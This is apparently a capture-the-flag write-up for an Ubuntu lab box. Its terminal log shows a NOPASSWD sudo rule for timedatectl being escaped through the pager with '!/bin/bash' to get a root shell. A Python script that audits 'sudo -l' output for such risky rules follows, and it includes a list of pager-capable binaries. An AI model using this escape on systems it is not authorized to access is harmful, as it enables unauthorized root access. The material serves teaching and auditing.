Last login: Fri Aug 9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User broken may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/timedatectl
(ALL) NOPASSWD: /sbin/reboot
broken@ubuntu:~$ sudo /usr/bin/timedatectl list-timezones
Africa/Abidjan
Africa/Accra
Africa/Addis_Ababa
Africa/Algiers
Africa/Asmara
Africa/Bamako
Africa/Bangui
Africa/Banjul
Africa/Bissau
Africa/Blantyre
Africa/Brazzaville
Africa/Bujumbura
Africa/Cairo
Africa/Casablanca
Africa/Ceuta
Africa/Conakry
Africa/Dakar
Africa/Dar_es_Salaam
Africa/Djibouti
Africa/Douala
Africa/El_Aaiun
Africa/Freetown
Africa/Gaborone
Africa/Harare
Africa/Johannesburg
Africa/Juba
Africa/Kampala
Africa/Khartoum
Africa/Kigali
Africa/Kinshasa
Africa/Lagos
Africa/Libreville
Africa/Lome
Africa/Luanda
Africa/Lubumbashi
Africa/Lusaka
Africa/Malabo
Africa/Maputo
Africa/Maseru
Africa/Mbabane
Africa/Mogadishu
Africa/Monrovia
!/bin/bash
root@ubuntu:~# whoami
root
root@ubuntu:~# uname
Linux
root@ubuntu:~# uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:27:e2:8c brd ff:ff:ff:ff:ff:ff
inet 192.168.92.145/24 brd 192.168.92.255 scope global dynamic ens33
valid_lft 1594sec preferred_lft 1594sec
inet6 fe80::319d:2d59:25c4:64b1/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:~#
Done, wrapping up!
Summary: you need to know the GTFOBins site, https://gtfobins.github.io/, which documents how the binaries a user is allowed to run under `sudo -l` can be used for privilege escalation.
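The root shell above came from a `sudo -l` rule that runs timedatectl as root without a password; its long `list-timezones` output goes through a pager, which can spawn a shell. The audit script below, an added example that is not part of the original write-up, parses `sudo -l` output in the layout shown on this box and flags rules that are NOPASSWD or that grant an unrestricted pager-capable tool; the sample text is constructed from the box's own `sudo -l` output and the list of pager-capable binaries is my own, not from the page.

```python
"""Audit `sudo -l` output for rules that hand a user a root-owned pager (and
through it a shell). Added example for this write-up; SAMPLE_SUDO_L is
constructed from the `sudo -l` output the box printed."""
import os
import re

# Tools that hand long output to $PAGER (less) by default; under sudo the
# pager runs as root, so an unrestricted rule on any of these is a
# GTFOBins-style escape candidate. timedatectl is the one used on this box.
PAGER_BINARIES = {"timedatectl", "systemctl", "journalctl", "less", "more", "man"}

# One rule line: "(runas) TAG: TAG: /path/to/binary [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)


def parse_sudo_l(text: str) -> list[dict]:
    """Return one dict per command rule listed after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        parts = m.group("cmd").split()
        rules.append({
            "runas": m.group("runas").strip(),
            "tags": tags,
            "binary": parts[0],
            "args": parts[1:],
        })
    return rules


def audit_sudo_l(text: str) -> list[dict]:
    """Attach to each rule the reasons it is risky; an empty list means
    nothing stood out for that rule."""
    findings = []
    for rule in parse_sudo_l(text):
        name = os.path.basename(rule["binary"])
        reasons = []
        if "NOPASSWD" in rule["tags"]:
            reasons.append("runs without re-authentication")
        if name in PAGER_BINARIES and not rule["args"]:
            # No argument restriction: every subcommand is allowed, including
            # the ones whose output is long enough to invoke the pager.
            reasons.append("unrestricted pager-capable tool; pager escape yields a root shell")
        findings.append({"binary": rule["binary"], "reasons": reasons})
    return findings


# Constructed sample in the layout `sudo -l` printed on this box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for broken on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User broken may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/timedatectl
    (ALL) NOPASSWD: /sbin/reboot
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{finding['binary']}: {'; '.join(finding['reasons']) or 'ok'}")
```

A rule that pins the arguments, such as `/usr/bin/timedatectl set-timezone *`, is parsed with non-empty `args` and is not flagged as a pager risk, which is the shape a remediated sudoers entry should take.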